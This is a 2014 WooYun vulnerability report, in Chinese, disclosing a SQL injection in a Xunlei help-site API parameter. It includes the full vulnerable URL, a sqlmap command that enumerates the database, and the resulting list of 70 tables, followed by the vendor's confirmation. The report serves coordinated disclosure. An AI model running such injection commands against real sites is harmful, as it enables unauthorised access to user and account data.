缺陷编号:WooYun-2014-089321
漏洞标题:迅雷某API接口存在SQL注入漏洞
相关厂商:迅雷
漏洞作者:有杀气
提交时间:2014-12-30 12:49
公开时间:2015-02-13 12:50
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-13: 细节向公众公开
额。。。感谢乌云,感谢党,终于会挖洞了,
http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001参数contentno存在sql注入,字符型
1 |
python sqlmap.py -u "http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001" -p "contentno" --tables -D xlhelp2 |
结果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
Database: xlhelp2<br> [70 tables]<br> +----------------------------+<br> | accountappeal |<br> | accountappeal_2010 |<br> | accountappeal_2011 |<br> | accountappeal_20110510 |<br> | accountappeal_2012 |<br> | accountappeal_20130802 |<br> | accountappealremark |<br> | accountappealresult |<br> | advplace |<br> | advs |<br> | appealgameinfo |<br> | articles |<br> | complaintsstatistics |<br> | contents |<br> | copartners |<br> | d |<br> | datatablebiz |<br> | datatabledetail |<br> | datatables |<br> | demonquestions |<br> | demonquestions_20110701 |<br> | formdata |<br> | forminfo |<br> | functionlogs |<br> | functions |<br> | gameactivity |<br> | gcid |<br> | hislogininfo |<br> | hotkeywords |<br> | hotquestions |<br> | libclassd |<br> | libclassm |<br> | libconfig |<br> | mailclass |<br> | mailinfo |<br> | mailsendtemp |<br> | menus |<br> | placardclass |<br> | placards |<br> | plusoperation |<br> | problemreplies |<br> | problemreplies_20110812 |<br> | productquestionclass |<br> | products |<br> | questions |<br> | questionsfeedbacks |<br> | researchdata |<br> | researchinfo |<br> | role_product |<br> | rolerights |<br> | roles |<br> | rtnappealidinfo |<br> | selfservice |<br> | stepreasons |<br> | userbbs |<br> | useronline |<br> | useronlinetime |<br> | users |<br> | usertobizno |<br> | usertofunction |<br> | usertomailclass |<br> | usertorole |<br> | workorder |<br> | workorder_20110812 |<br> | workorderdispatch |<br> | workorderdispatch_20110812 |<br> | workorderflow |<br> | workorderflow_20110812 |<br> | workorderquestionstat |<br> | xlusers |<br> +----------------------------+ |
好人一生平安
危害等级:中
漏洞Rank:10
确认时间:2014-12-3013:53
感谢反馈。属于迅雷客服应用。
2014-12-30:请漏洞作者联系security at xunlei.com 以便发放奖励。
2014年度的奖励将于2014年12月31日24时到期。
原文连接
的情况下转载,若非则不得使用我方内容。